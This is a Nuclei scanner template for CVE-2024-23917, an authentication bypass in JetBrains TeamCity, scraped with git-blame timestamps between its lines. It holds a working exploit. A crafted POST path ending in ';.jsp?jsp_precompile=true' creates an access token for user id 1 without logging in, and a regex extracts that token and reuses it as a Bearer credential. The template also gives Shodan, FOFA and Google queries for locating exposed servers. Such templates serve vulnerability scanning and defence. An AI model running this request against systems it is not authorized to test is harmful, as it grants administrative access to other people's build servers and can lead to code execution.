2024-04-30 12:52:48 +00:00
|
|
|
id: CVE-2024-23917
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: JetBrains TeamCity > 2023.11.3 - Authentication Bypass
|
|
|
|
author: iamnoooob,rootxharsh,pdresearch
|
|
|
|
severity: critical
|
|
|
|
description: |
|
|
|
|
In JetBrains TeamCity before 2023.11.3 authentication bypass leading to RCE was possible
|
|
|
|
reference:
|
|
|
|
- https://github.com/fkie-cad/nvd-json-data-feeds
|
|
|
|
- https://www.rapid7.com/db/vulnerabilities/jetbrains-teamcity-cve-2024-23917/
|
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
|
|
cvss-score: 9.8
|
|
|
|
cve-id: CVE-2024-23917
|
|
|
|
cwe-id: CWE-306,CWE-288
|
|
|
|
epss-score: 0.00091
|
|
|
|
epss-percentile: 0.38219
|
|
|
|
cpe: cpe:2.3:a:jetbrains:teamcity:*:*:*:*:*:*:*:*
|
|
|
|
metadata:
|
|
|
|
verified: true
|
2024-05-02 17:06:58 +00:00
|
|
|
max-request: 1
|
2024-04-30 12:52:48 +00:00
|
|
|
vendor: jetbrains
|
|
|
|
product: teamcity
|
2024-05-31 19:23:20 +00:00
|
|
|
shodan-query: http.title:teamcity
|
|
|
|
fofa-query: title=teamcity
|
|
|
|
google-query: intitle:teamcity
|
2024-04-30 12:52:48 +00:00
|
|
|
tags: cve,cve2024,auth-bypass,teamcity
|
|
|
|
flow: http(1) && http(2)
|
2024-05-02 17:06:58 +00:00
|
|
|
|
2024-04-30 12:52:48 +00:00
|
|
|
http:
|
|
|
|
- method: POST
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/app/rest/users/id:1/tokens/{{randstr}};.jsp?jsp_precompile=true"
|
|
|
|
headers:
|
|
|
|
Content-Type: "application/x-www-form-urlencoded"
|
|
|
|
|
|
|
|
matchers:
|
|
|
|
- type: dsl
|
|
|
|
dsl:
|
|
|
|
- status_code==200
|
|
|
|
- "contains(content_type,'application/xml')"
|
|
|
|
- 'contains(body,"<token name=\"{{randstr}}\"")'
|
|
|
|
condition: and
|
2024-04-30 12:55:33 +00:00
|
|
|
internal: true
|
2024-04-30 12:52:48 +00:00
|
|
|
|
|
|
|
extractors:
|
|
|
|
- type: regex
|
|
|
|
part: body
|
|
|
|
name: authtoken
|
|
|
|
internal: true
|
|
|
|
group: 1
|
|
|
|
regex:
|
|
|
|
- 'value="(.+)"'
|
|
|
|
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/app/rest/server"
|
|
|
|
headers:
|
|
|
|
Authorization: "Bearer {{authtoken}}"
|
|
|
|
|
|
|
|
extractors:
|
|
|
|
- type: dsl
|
|
|
|
dsl:
|
|
|
|
- '"Token:" + authtoken'
|
|
|
|
|
|
|
|
matchers:
|
|
|
|
- type: dsl
|
|
|
|
dsl:
|
|
|
|
- "status_code==200"
|
|
|
|
- "contains(content_type,'application/xml')"
|
|
|
|
- "contains(body,'<projects href=')"
|
|
|
|
condition: and
|
2024-06-01 06:53:00 +00:00
|
|
|
# digest: 4a0a00473045022042ca57e91002eeb95a0974c5cd85344b00d8168df68b416ab82e02dc3fdf729c0221009dc47418fd94b57d224080240cf710c7b669b600f37a6cfb92a1b1f75880b62c:922c64590222798bb761d5b6d8e72950
|